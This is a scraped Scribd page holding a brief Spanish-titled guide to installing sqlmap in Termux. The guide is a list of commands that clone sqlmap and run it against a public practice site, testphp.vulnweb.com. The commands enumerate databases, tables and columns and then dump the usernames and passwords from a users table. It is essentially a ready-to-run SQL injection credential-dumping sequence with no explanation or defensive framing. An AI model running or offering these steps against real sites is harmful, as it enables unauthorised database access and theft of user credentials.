0% found this document useful (0 votes)
131 views1 page

Cómo Instalar SQLmap en Termux

The document contains commands to update and upgrade a system, clone the sqlmap tool from GitHub, and run sqlmap against a target to find databases, tables, columns, and dump usernames and passwords by making API calls that inject SQL queries into the parameters of the target URL.

Uploaded by

Jackson Bailey
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
131 views1 page

Cómo Instalar SQLmap en Termux

The document contains commands to update and upgrade a system, clone the sqlmap tool from GitHub, and run sqlmap against a target to find databases, tables, columns, and dump usernames and passwords by making API calls that inject SQL queries into the parameters of the target URL.

Uploaded by

Jackson Bailey
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 1

apt update && apt upgrade -y

apt update && apt upgrade -y

git clone https://github.com/sqlmapproject/sqlmap

cd sqlmap

python2 sqlmap.py
_________________________________

python2 sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=1 --dbs

python2 sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat= -D acuart


--tables

python2 sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat= -D acuart -T


users --columns

python2 sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat= -D acuart -T


users -C uname --dump

python2 sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat= -D acuart -T


users -C pass --dump

You might also like